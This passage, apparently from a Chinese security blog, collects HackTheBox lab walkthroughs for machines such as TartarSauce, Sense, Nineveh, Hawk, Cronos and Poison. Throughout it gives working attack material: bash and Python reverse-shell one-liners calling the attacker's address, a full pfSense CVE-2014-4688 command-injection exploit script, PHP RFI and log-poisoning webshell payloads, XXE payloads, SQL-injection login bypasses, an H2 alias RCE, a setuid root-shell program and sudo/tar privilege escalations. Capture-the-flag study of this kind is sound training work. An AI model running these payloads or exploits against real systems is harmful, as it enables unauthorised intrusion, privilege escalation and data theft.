 "zNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBw"
 "ACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==");
 exit(0);
 }
 if ( v24 == 1 )
 displayTarget((char *)argv[3]);
 strcpy(v11, argv[3]);
 v4 = getpid();
 v5 = time(0);
 v6 = clock();
 v7 = mix(v6, v5, v4);
 srand(v7);
 v21 = rand();
 sprintf(name, "/tmp/.backup_%i", v21);
 sprintf(command, "/usr/bin/zip -r -P magicword %s %s > /dev/null", name, v11);
 system(command);
 if ( access(name, 0) == -1 )
 {
 if ( v24 == 1 )
 displayWarning("The target path doesn't exist");
 }
 else
 {
 if ( v24 == 1 )
 displaySuccess("Finished! Encoded backup is below:\n");
 sprintf(command, "/usr/bin/base64 -w0 %s", name);
 system(command);
 }
 if ( v24 == 1 )
 puts("\n");
 remove(name);
 fclose(stream);
 return 0;
}

通过代码了解到三个参数的作用如下：

argv[1] ，第一个参数如果是-q 则不打印这个图案

argv[2] ，第二个参数是认证作用，和/etc/myplace/keys 文件匹配token，匹配正确才会往下执行。

这里查看/etc/myplace/keys，发现argv[2]为空的话也可以匹配成功，因为/etc/myplace/keys有一行是空

argv[3] ，第三个参数有校验值，不能包含.. /root ; & ` $ | // / /etc ，

然后argv[3]拼接传入system()执行命令

argv[3]的参数校验防止了一些命令注入符号，但是遗漏了换行符 \n ，并且/usr/local/bin/backup属于admin组，拥有root权限，所以可以直接通过命令注入得到root权限。

第三个参数先输入一个'，然后通过enter 键获得换行符，再/bin/bash #' 闭合单引号，即可执行获得root shell

tom@node:/$ /usr/local/bin/backup -q '' '
> /bin/bash #'

TartarSauce

Mon, 18 Jul 2022 15:56:40 +0800

nmap

sudo nmap -T4 -p- -vv -sV 10.10.10.88

只开了80

扫描目录

10.10.10.88/webservices/wp/

可能是解析有问题，查看源码，发现域名tartarsauce.htb，cms是WordPress 4.9.4

添加hosts后解析正常

使用wpscan扫描一下漏洞（kali自带）

https://github.com/wpscanteam/wpscan

这里扫了很久，慢慢等把

wpscan --url http://10.10.10.88/webservices/wp --enumerate ap --detection-mode aggressive --plugins-detection aggressive --plugins-version-detection aggressive

存在插件gwolle

http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt

发现gwolle 存在远程文件包含RFI

https://www.exploit-db.com/exploits/38861

根据报告，只能远程文件包含wp-load.php 文件，这个只要重命名一下就可以了。

保存 wp-load.php，

<?php
echo "hack!!!";
echo exec("bash -c 'bash -i >& /dev/tcp/10.10.16.8/2333 0>&1'");
?>

本地起http服务

python2 -m SimpleHTTPServer 80

执行

curl 10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.16.8/

获得www shell

提权

查看端口服务

netstat -tunlp

/var/www/html/webservices/wp/wp-config.php 发现mysql密码

w0rdpr3$$d@t@b@$3@cc3$$

wp-config.php

查看/etc/passwd，只有root和onuma 有bash shell

尝试使用mysql密码登录root和onuma

$ su root
Password: w0rdpr3$$d@t@b@$3@cc3$$
su: Authentication failure
$ su onuma
Password: w0rdpr3$$d@t@b@$3@cc3$$
su: Authentication failure
$

密码错误！

登录mysql

$ mysql -uwpuser -p
Enter password: w0rdpr3$$d@t@b@$3@cc3$$

找到wpadmin密码，但是是加密的，没有破解成功

mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| wp |
+--------------------+
2 rows in set (0.00 sec)

mysql> use wp
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-----------------------+
| Tables_in_wp |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_gwolle_gb_entries |
| wp_gwolle_gb_log |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
14 rows in set (0.00 sec)

mysql> select * from wp_users;
+----+------------+------------------------------------+---------------+--------------------+----------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+--------------------+----------+---------------------+---------------------+-------------+--------------+
| 1 | wpadmin | $P$BBU0yjydBz9THONExe2kPEsvtjStGe1 | wpadmin | wpadmin@test.local | | 2018-02-09 20:49:26 | | 0 | wpadmin |
+----+------------+------------------------------------+---------------+--------------------+----------+---------------------+---------------------+-------------+--------------+
1 row in set (0.00 sec)

mysql>

sudo -l

tar命令拥有onuma用户权限

通过tar获得onuma shell 有两种方法，参考

https://gtfobins.github.io/gtfobins/tar/#shell

方法一

www-data@TartarSauce:/tmp$ sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
</null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
tar: Removing leading `/' from member names
id
uid=1000(onuma) gid=1000(onuma) groups=1000(onuma),24(cdrom),30(dip),46(plugdev)

方法二

www-data@TartarSauce:/tmp$ sudo -u onuma tar xf /dev/null -I '/bin/bash -c "sh <&2 1>&2"'
<sudo -u onuma tar xf /dev/null -I '/bin/bash -c "sh <&2 1>&2"'
id
uid=1000(onuma) gid=1000(onuma) groups=1000(onuma),24(cdrom),30(dip),46(plugdev)

提权到root

使用pspy32监听程序，发现定时任务

root 每5分钟左右执行/usr/sbin/backuperer

file分析backuperer是个shell脚本

/usr/sbin/backuperer

#!/bin/bash

#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------

# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check

# formatting
printbdr()
{
 for n in $(seq 72);
 do /usr/bin/printf $"-";
 done
}
bdr=$(printbdr)

# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg

# Cleanup from last time. 删除/var/tmp/.* 隐藏文件和删除/var/tmp/check目录
/bin/rm -rf $tmpdir/.* $check

# Backup onuma website dev files. 将/var/www/html压缩保存为一个隐藏文件到/var/tmp/
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

# Added delay to wait for backup to complete if large files get added. 等待30秒
/bin/sleep 30

# Test the backup integrity #比较文件差异
integrity_chk()
{
 /usr/bin/diff -r $basedir $check$basedir
}
#创建/var/tmp/check目录
/bin/mkdir $check
#将/var/tmp/隐藏的压缩文件解压到/var/tmp/check目录
/bin/tar -zxvf $tmpfile -C $check


#比较解压的/var/tmp/check和当前/var/www/html的文件差异，
#将不同的文件列表写入/var/backups/onuma_backup_test.txt，
#如果相同，将/var/tmp/隐藏的压缩文件保存为/var/backups/onuma-www-dev.bak，并删除check目录
if [[ $(integrity_chk) ]]
then
 # Report errors so the dev can investigate the issue.
 /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran : $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
 integrity_chk >> $errormsg
 exit 2
else
 # Clean up and save archive to the bkpdir.
 /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
 /bin/rm -rf $check .*
 exit 0
fi

整个脚本的执行：

1.onuma用户将web目录压缩备份，
2.30秒后由root用户解压到/var/tmp/check目录，检查一下web目录有没有改动，记录一下改动的文件。没有改动就保存压缩包到备份目录

利用思路：

由于我们现在是onuma，压缩的文件是保存到/var/tmp/
在/usr/sbin/backuperer执行压缩文件步骤的时候，在30秒内把压缩文件替换为包含exp脚本的压缩包，30秒后root解压被替换过的压缩包，root解压出来的exp脚本权限提升为root，然后onuma执行exp脚本即可提权到root

编译exp.c

#include <unistd.h>
int main(void)
{
setregid(0,0);
setreuid(0,0);
execl("/bin/sh", "sh", 0);
}

#编译
gcc -m32 exp.c -o exp
#添加suid位权限(第一位)，setuid: 设置使文件在执行阶段具有文件所有者的权限
chmod 7777 exp

#构造web目录
mkdir -p var/www/html
cp exp /var/www/html
#打包
tar -zcvf exp.tar.gz var

当pspy32监听到/usr/sbin/backuperer执行的时候，在30秒内快速删除掉/var/tmp/.2aecc95...的隐藏文件，并把打包好的exp.tar.gz下载并重命名到/var/tmp/.2aecc95...

wget 10.10.16.3/exp.tar.gz -O /var/tmp/.2aecc95...

等待一会root会把压缩包解压到/var/tmp/check/

提权成功

Sense

Wed, 13 Jul 2022 09:43:40 +0800

nmap扫描

sudo nmap -T4 -Pn -n -r -p- -vv -sV 10.10.10.60

发现80，443

pfsense是个开源的防火墙和路由器功能的设备

简单尝试了下

admin/admin,root/root,test/test,user/user,pfsense/pfsense,admin/pfsense

没登录成功，

看了下服务response返回 Server: lighttpd/1.4.35

搜了下发现

https://www.cvedetails.com/cve-details.php?t=1&cve_id=CVE-2014-2323

经过验证发现不包括 lighttpd/1.4.35 版本

用dirbuster扫描一下web路径

扫到一个安全日志信息，说有一个漏洞没修。

https://10.10.10.60/changelog.txt

继续扫描发现 system-users.txt

尝试登录 Rohit/pfsense 还是登不上

最后发现用户密码是 rohit/pfsense

这里看到pfsense的版本是

2.1.3-RELEASE (amd64)
built on Thu May 01 15:52:13 EDT 2014
FreeBSD 8.3-RELEASE-p16

搜了下相关版本的漏洞

漏洞利用

https://www.exploit-db.com/exploits/43560

CVE-2014-4688

执行脚本

python3 CVE-2014-4688.py --rhost 10.10.10.60 --lhost 10.10.14.9 --lport 23333 --username rohit --password pfsense

#!/usr/bin/env python3

# Exploit Title: pfSense <= 2.1.3 status_rrd_graph_img.php Command Injection.
# Date:2018-01-12
# Exploit Author: absolomb
# Vendor Homepage: https://www.pfsense.org/
# Software Link: https://atxfiles.pfsense.org/mirror/downloads/old/
# Version: <=2.1.3
# Tested on: FreeBSD 8.3-RELEASE-p16
# CVE : CVE-2014-4688

import argparse
import requests
import urllib
import urllib3
import collections

'''
pfSense <= 2.1.3 status_rrd_graph_img.php Command Injection.
This script will return a reverse shell on specified listener address and port.
Ensure you have started a listener to catch the shell before running!
'''

parser = argparse.ArgumentParser()
parser.add_argument("--rhost", help = "Remote Host")
parser.add_argument('--lhost', help = 'Local Host listener')
parser.add_argument('--lport', help = 'Local Port listener')
parser.add_argument("--username", help = "pfsense Username")
parser.add_argument("--password", help = "pfsense Password")
args = parser.parse_args()

rhost = args.rhost
lhost = args.lhost
lport = args.lport
username = args.username
password = args.password


# command to be converted into octal
command = """
python -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("%s",%s));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);'
""" % (lhost, lport)


payload = ""

# encode payload in octal
for char in command:
 payload += ("\\" + oct(ord(char)).lstrip("0o"))

login_url = 'https://' + rhost + '/index.php'
exploit_url = "https://" + rhost + "/status_rrd_graph_img.php?database=queues;"+"printf+" + "'" + payload + "'|sh"

headers = [
 ('User-Agent','Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0'),
 ('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'),
 ('Accept-Language', 'en-US,en;q=0.5'),
 ('Referer',login_url),
 ('Connection', 'close'),
 ('Upgrade-Insecure-Requests', '1'),
 ('Content-Type', 'application/x-www-form-urlencoded')
]

# probably not necessary but did it anyways
headers = collections.OrderedDict(headers)

# Disable insecure https connection warning
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

client = requests.session()

# try to get the login page and grab the csrf token
try:
 login_page = client.get(login_url, verify=False)

 index = login_page.text.find("csrfMagicToken")
 csrf_token = login_page.text[index:index+128].split('"')[-1]

except:
 print("Could not connect to host!")
 exit()

# format login variables and data
if csrf_token:
 print("CSRF token obtained")
 login_data = [('__csrf_magic',csrf_token), ('usernamefld',username), ('passwordfld',password), ('login','Login') ]
 login_data = collections.OrderedDict(login_data)
 encoded_data = urllib.parse.urlencode(login_data)

# POST login request with data, cookies and header
 login_request = client.post(login_url, data=encoded_data, cookies=client.cookies, headers=headers)
else:
 print("No CSRF token!")
 exit()

if login_request.status_code == 200:
 print("Running exploit...")
# make GET request to vulnerable url with payload. Probably a better way to do this but if the request times out then most likely you have caught the shell
 try:
 exploit_request = client.get(exploit_url, cookies=client.cookies, headers=headers, timeout=5)
 if exploit_request.status_code:
 print("Error running exploit")
 except:
 print("Exploit completed")

执行成功

直接是root权限

也可以通过msf找到exp

searchsploit pfsense 或者 search pfsense

Nineveh

Fri, 08 Jul 2022 18:00:40 +0800

nmap

sudo nmap -T4 -p- -vv -sV 10.10.10.43

dirbuster 80端口

dirbuster 443端口

这里用了不同的字典扫了几遍，扫出的关键路径和文件

info.php、/department 、/db

phpLiteAdmin v1.9

搜了下版本存在远程代码执行，但是需要登录

使用hydra爆破

hydra -l none -P /usr/share/wordlists/rockyou.txt 10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password" -t 64 -V

得到密码 password123

登录成功

插入一个恶意的php文件

插入表

写入字段默认值

Default Value

<?php system($_REQUEST["cmd"]);?>

文件写入，但是不在web目录，无法解析

这里暂时没办法往下渗透了。

查看info.php

allow_url_fopen=off

allow_url_include=on

http://10.10.10.43/department/

这里password参数存在php弱类型的问题

把参数password改为password[]

当传递参数去和密码比较的时候

if(strcmp($_REQUEST['password'], $password) == 0)

因为传递了一个数组去和密码进行比较，php会报错返回Null，Null和0去比较结果为true。导致if被绕过，导致可以直接登录

以下请求直接登录成功

POST /department/login.php HTTP/1.1
Host: 10.10.10.43
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
Origin: http://10.10.10.43
Connection: close
Referer: http://10.10.10.43/department/login.php
Cookie: PHPSESSID=aio9cnnl1ish99moqj1lu35it6
Upgrade-Insecure-Requests: 1

username=admin&password[]=

admin

notes参数存在文件包含，显示了ninevehNotes.txt的内容在下方

前面通过info.php发现allow_url_include=on是开启的，尝试使用php伪协议执行命令

报错了，尝试了几次发现notes存在参数检查，必须包含ninevehNotes字符串

notes=/ninevehNotes/../../../../../../../etc/passwd

这样就无法直接包含php://input

可以包含443端口之前写入的恶意文件 /var/tmp/exp.php

http://10.10.10.43/department/manage.php?notes=/ninevehNotes/../../../var/tmp/exp.php&cmd=id

执行成功

反弹shell

http://10.10.10.43/department/manage.php?notes=/ninevehNotes/../../../var/tmp/exp.php&cmd=bash+-c+'bash+-i+>%26+/dev/tcp/10.10.16.3/2333+0>%261'

获得shell

pkexec提权

python3 CVE-2021-4034-py3.py

Blue

Sat, 02 Jul 2022 10:35:40 +0800

namp

sudo nmap -T4 -p- -sV --script vuln -vv 10.10.10.40

nmap识别到存在永恒之蓝漏洞(ms17-010)

msf

use auxiliary/scanner/smb/smb_version

use exploit/windows/smb/ms17_010_eternalblue

set rhosts 10.10.10.40
set lhost 10.10.14.12

run

flag

cd C:\Users | dir

type .\Administrator\Desktop\root.txt && type .\haris\Desktop\user.txt

Hawk

Mon, 27 Jun 2022 19:12:40 +0800

nmap

nmap -T4 -p- -vv -sV 10.10.10.102

ftp匿名登录，发现 .drupal.txt.enc

下载到本地查看发现是openssl文件base64编码了

wget -r ftp://10.10.10.102/messages/

base64解码后尝试openssl解密

解密脚本

https://github.com/HrushikeshK/openssl-bruteforce

python2 brute.py /usr/share/wordlists/rockyou.txt ciphers.txt drupal.txt

获得密码：PencilKeyboardScanner123

80端口，Drupal

发现ftp获得的密码就是Drupal的后台密码

admin/PencilKeyboardScanner123

发现可以启动PHP filter模块

可以解析文档中的php代码

反弹shell

<?php
echo "hack!!!";
echo exec("bash -c 'bash -i >& /dev/tcp/10.10.14.2/2333 0>&1'");
?>

保存就直接执行了

敏感信息收集，从代码中找到了密码 drupal4hawk

find /var/www/html/ -name '*.php'|xargs grep 'password' 2>/dev/null

./sites/default/settings.php

除了mysql，可能其他用户也使用了这个密码，最后试到ssh用户密码是daniel/drupal4hawk

切到bash

import pty;pty.spawn("/bin/bash")

提权

8082端口只允许本地访问，使用ssh把流量转发出去

ssh -L 8888:127.0.0.1:8082 daniel@10.10.10.102

访问本地8082

将jdbc url指定到root目录，直接连接

连接成功：

这里有个注入问题：

https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html

创建一个执行命令的函数 SHELLEXEC111

CREATE ALIAS SHELLEXEC111 AS $$ String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); return s.hasNext() ? s.next() : ""; }$$;

调用函数SHELLEXEC111

call SHELLEXEC111('id')

反弹shell

在daniel下创建一个shell

daniel@hawk:~$ cat /home/daniel/shell
bash -i >& /dev/tcp/10.10.14.2/2444 0>&1
daniel@hawk:~$ chmod +x /home/daniel/shell
daniel@hawk:~$

使用root执行/home/daniel/shell

call SHELLEXEC111('bash /home/daniel/shell')

Devops

Fri, 17 Jun 2022 16:56:40 +0800

Devops

nmap

nmap -r -p- -vv -sV 10.10.10.91

5000端口

扫描web目录

发现上传xml功能

上传发现直接解析了xml，并返回路径

<?xml version="1.0" encoding="UTF-8"?>
<data>
<Author>max</Author>
<Subject>test</Subject>
<Content>hello</Content>
</data>

尝试利用xxe读取任意文件

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE foo [

 <!ENTITY xxe SYSTEM "file:///etc/passwd" >

]>

<data>

<Author>&xxe;</Author>

<Subject>test</Subject>

<Content>hello</Content>

</data>

读到 /home 目录下存在osboxes、git、roosa、blogfeed 用户，git和roosa有、/bin/bash权限

结合22端口，可以通过读取用户ssh证书实现免密登录

/home/roosa/.ssh/id_rsa

登录roosa

mv id_rsa roosa_id_rsa

chmod 600 roosa_id_rsa

ssh -i roosa_id_rsa roosa@10.10.10.91

提权

查看 /home/roosa/.bash_history

这里截取了关键的历史命令记录

mkdir resources
cd resources
mkdir integration
mkdir integration/auth_credentials.key
nano integration/auth_credentials.key/
ls -altr
chmod go-rwx authcredentials.key
ls -atlr
cd ..
ls -altr
chmod -R o-rwx .
ls -altr
ls resources/
ls resources/integration/
ls -altr resources/
ls -altr resources/integration/
rm -Rf resources/integration/auth_credentials.key
mv resources/authcredentials.key resources/integration/
git add resources/integration/authcredentials.key #添加了一个ssh密钥
git commit -m 'add key for feed integration from tnerprise backend' #部署到仓库
ls -altr resources/integration/
git push #推送
ssh-keygen #重新生成一个ssh密钥
ös -altr
ls .altr
ls -altr
cat kak
cp kak resources/integration/authcredentials.key #覆盖之前的密钥
git add resources/integration/authcredentials.key #重新添加ssh密钥
git commit -m 'reverted accidental commit with proper key' #部署到仓库
git push #推送
ls -altr
rm kak #删除密钥
rm kak.pub
git log
ls -altr

从备注的说法是push了一个错误的key，然后重新提交了。

猜测开发者刚开始push的key可能是高权限(root)的key

通过git回退到之前的版本，就能获取到root的登录密钥

查看git 提交日志

cd work/blogfeed

git log

回退到第一次添加key的版本

roosa@gitter:~/work/blogfeed$ git reset --hard d387abf63e05c9628a59195cec9311751bdb283f
HEAD is now at d387abf add key for feed integration from tnerprise backend

roosa@gitter:~/work/blogfeed$ cat resources/integration/authcredentials.key

authcredentials.key （root）

登录root

chmod 600 resources/integration/authcredentials.key

ssh -i resources/integration/authcredentials.key root@127.0.0.1

Sunday

Fri, 10 Jun 2022 18:16:40 +0800

nmap

sudo nmap -r -p- -vv -sV 10.10.10.76

79端口 finger

https://baike.baidu.com/item/finger%E6%9C%8D%E5%8A%A1/10976284?fr=aladdin

公开的漏洞信息中能够找到finger漏洞能够枚举ssh的用户名，因为又扫到了22022是ssh服务，

找到一个枚举脚本

https://github.com/pentestmonkey/finger-user-enum

./finger-user-enum.pl -m 50 -U /usr/share/dnsrecon/subdomains-top1mil-20000.txt -t 10.10.10.76|less -S

这里注意到有两个用户，sunny和sammy记录了登录的IP地址，

经过尝试发现密码是题目名字，老套路了

sunny/sunday

提权

/root/troll 这个脚本写死了

发现备份文件 /backup/shadow.backup

使用john破解sammy密码，保存到文件sammy.txt

$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB

执行

john --wordlist=/usr/share/wordlists/rockyou.txt sammy.txt

得到sammy密码cooldude!

执行sudo -l 发现sunny免密执行/root/troll，sammy免密执行root权限的/usr/bin/wget，

通过wget覆盖/root/troll 即可获得root shell

shell

#!/usr/bin/python

import socket
import subprocess
import os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.2",2333))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]);

sammy

sudo wget -O /root/troll http://10.10.14.2/shell.py

sunny

#这里要执行快一点，有定时任务会快速覆盖这个文件

sudo /root/troll

获得shell

Solidstate

Thu, 02 Jun 2022 17:54:40 +0800

Solidstate

sudo nmap -T4 -Pn -n -r -p- -vv -sV 10.10.10.51

80端口，扫了目录没有什么发现，根据端口开放情况，可能是针对邮件服务器的渗透

4555

JAMES Remote Administration Tool 2.3.2

james默认口令root/root

修改邮件用户密码

#查询用户列表
listusers

#修改用户密码
setpassowrd <user> <password>

telnet 10.10.10.51 110

USER mindy

PASS 123456

#查看第二封邮件

retr 2

第二封邮件发现了管理员mailadmin发的ssh账号密码

username: mindy
pass: P@55W0rd1!2@

登录ssh

提权

mindy的shell是rbash，很多命令无法执行，将rbash提升到bash，重新登录

ssh mindy@10.10.10.51 -t bash

下载pspy32到靶机执行

监控发现每3分钟 root执行一次python /opt/tmp.py

直接修改tmp.py 内容为反弹shell

echo "os.system('bash -c "bash -i >& /dev/tcp/10.10.14.8/2333 0>&1"')">>/opt/tmp.py

Cronos

Fri, 20 May 2022 17:31:40 +0800

nmap

sudo nmap -T4 -Pn -n -r -p- -vv -sV 10.10.10.13

访问80，扫了下目录什么也没有。

53端口，尝试解析靶机的域名

使用nslookup指定靶机为DNS服务器，然后解析靶机的域名

nslookup
> server 10.10.10.13
Default server: 10.10.10.13
Address: 10.10.10.13#53
> 10.10.10.13
13.10.10.10.in-addr.arpa name = ns1.cronos.htb.
>

拿到ns1.cronos.htb

使用dig查询DNS记录，DNS服务器存在区域传输漏洞可以使用axfr

http://t.zoukankan.com/ibyte-p-6114893.html

dig axfr cronos.htb @10.10.10.13

拿到三个子域名，ns1,www,admin

添加到/etc/hosts

访问www.cronos.htb

看了下源码都是跳转到laravel官网，没有发现什么功能

扫web目录，没发现有价值的信息

访问admin.cronos.htb

尝试过admin枚举没有成功

SQL注入登录成功

username：' or 1=1#
password：' or 1=1#

存在命令执行

8.8.8.8;id

反弹shell

8.8.8.8;python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.3",2333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

或者

POST /welcome.php HTTP/1.1
Host: admin.cronos.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
Origin: http://admin.cronos.htb
Connection: close
Referer: http://admin.cronos.htb/welcome.php
Cookie: PHPSESSID=r5bp088ag2fp2k38m0rronkfj4
Upgrade-Insecure-Requests: 1

command=bash+-c+'bash+-i+>%26+/dev/tcp/10.10.16.3/2333+0>%261'&host=

升级交互式shell

python -c 'import pty;pty.spawn("bash")'

Ctrl+Z

stty raw -echo;fg

Enter

提权

使用pspy32，检测到root每分钟会执行www-data的php脚本，/var/www/laravel/artisan

查看/var/www/laravel/artisan发现是反弹shell脚本，而www-data有该文件读写权限

修改此处

一分钟反弹shell成功

Valentine

Fri, 13 May 2022 16:06:40 +0800

nmap

sudo nmap -T4 -Pn -sV 10.10.10.79

访问80，图片给的提示应该是心脏出血漏洞 heartbleed

dirbuster扫描web路径

http://10.10.10.79/dev/

hype_key

xxd -r -p hype_key>id_rsa

发现是ssh登录需要的密钥文件，hype应该是用户名，尝试登录，发现需要密码

heartbleed 漏洞利用

#查找kali上的脚本

searchsploit heartbleed

#复制到当前目录
searchsploit -m 32745.py

python2 32745.py -h

python2 32745.py 10.10.10.79

得到

$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==


#base64解码，这个应该就是密码

echo "aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==" | base64 -d

heartbleedbelievethehype

ssh -i id_rsa hype@10.10.10.79

提示id_rsa权限太大，修改一下密钥文件权限，重新登录

chmod 500 id_rsa

登录成功

提权，

sudo -l需要密码

查看进程信息

ps -aux |grep root

发现root进程 /usr/bin/tmux -S /.devs/dev_sess

tmux就是一个终端复用器，简单来说就是个终端

直接执行tmux -S /.devs/dev_sess，即可获得root shell

Poison

Fri, 13 May 2022 14:17:40 +0800

nmap

sudo nmap -T4 -Pn -sT -n 10.10.10.84

80端口

http://10.10.10.84/browse.php?file=phpinfo.php

查看了下发现

allow_url_fopen on
allow_url_include off

#不能远程文件包含，只能看看文件

http://10.10.10.84/browse.php?file=listfiles.php

发现一个pwdbackup.txt文件

http://10.10.10.84/browse.php?file=pwdbackup.txt

居然是密码文件，还提示你解码13次，看起来是base64编码了13次

解码13次，写个简单脚本

import base64
import sys

def base64_decode(data,n):
 num=0
 while num < int(n):
 data = base64.b64decode(data)
 num = num +1
 print(data)

if __name__ == '__main__':
 data = sys.argv[2]
 n = sys.argv[1]
 base64_decode(data,n)

执行

python3 base64s.py 13 'data'

得到密码

Charix!2#4%6&8(0

尝试ssh直接登录root/Charix!2#4%6&8(0，发现密码不正确

尝试了以下密码都失败

Charix!2#4%6&8(0
root!2#4%6&8(0
Root!2#4%6&8(0
ROOT!2#4%6&8(0

看一下有什么用户

http://10.10.10.84/browse.php?file=../../../../../../../../../etc/passwd

发现用户名charix和，尝试登录charix/Charix!2#4%6&8(0

ssh charix@10.10.10.84

登录成功，

其他思路:

思路一：

LFI+apache日志

本地文件包含，需要将PHP代码写入服务器文件，并且找到文件路径

找apache日志访问路径，

https://blog.codeasite.com/how-do-i-find-apache-http-server-log-files/

通过目录穿越访问到apache日志文件，发现记录了User-Agent

通过文件包含执行命令

发送请求，User-Agent记录在httpd-access.log

GET /browse.php?file=../../../../../../var/log/httpd-access.log HTTP/1.1
Host: 10.10.10.84
User-Agent: <?php system($_REQUEST['cmd']); ?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

执行命令

GET /browse.php?file=../../../../../../var/log/httpd-access.log&cmd=id HTTP/1.1
Host: 10.10.10.84
User-Agent: <?php system($_REQUEST['cmd']); ?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

这个思路拿到权限用户是www，后门没继续搞下去。

思路二：LFI+phpinfo条件竞争

漏洞原理：php上传的临时文件上传到服务器被删除之前(上传的请求结束就删除，所以要让请求的时间更久)，使用文件包含临时文件执行php代码。

漏洞条件：

能够访问phpinfo路径
file_uploads on

参考：

https://rafalharazinski.gitbook.io/security/other-web-vulnerabilities/local-remote-file-inclusion/phpinfo-log-race-condition

脚本地址

https://github.com/roughiz/lfito_rce

执行脚本

nc -lvp 23333

python2 lfito_rce.py -l "http://10.10.10.84/browse.php?file=" --lhost 10.10.16.2 --lport 23333 -t 12 -i "http://10.10.10.84/phpinfo.php"

已经拿到www权限。

回到charix用户提权

发现在charix用户目录下有个压缩包文件

下载到本地

scp charix@10.10.10.84:~/secret.zip ./

解压，发现密码就是之前登录的密码，Charix!2#4%6&8(0

乱码，不知道是什么，先暂时放着

ps -aux

发现Xvnc是以root权限运行

ps -auxww |grep vnc

vnc的端口是5901

netstat -an|grep LIST

尝试登录vnc，需要将靶机5901端口转发到本地

ssh -L 5901:127.0.0.1:5901 charix@10.10.10.84

搜了下发现登录vnc的密码也可以以文件的形式存在

之前解压出来的secret文件应该就是密码

vncviewer -passwd ./secret 127.0.0.1:5901

登录成功，并且是root权限

Beep

Thu, 12 May 2022 14:51:40 +0800

nmap

sudo nmap -T4 -Pn -sS -n -p- -vv -sV 10.10.10.7

80，443端口

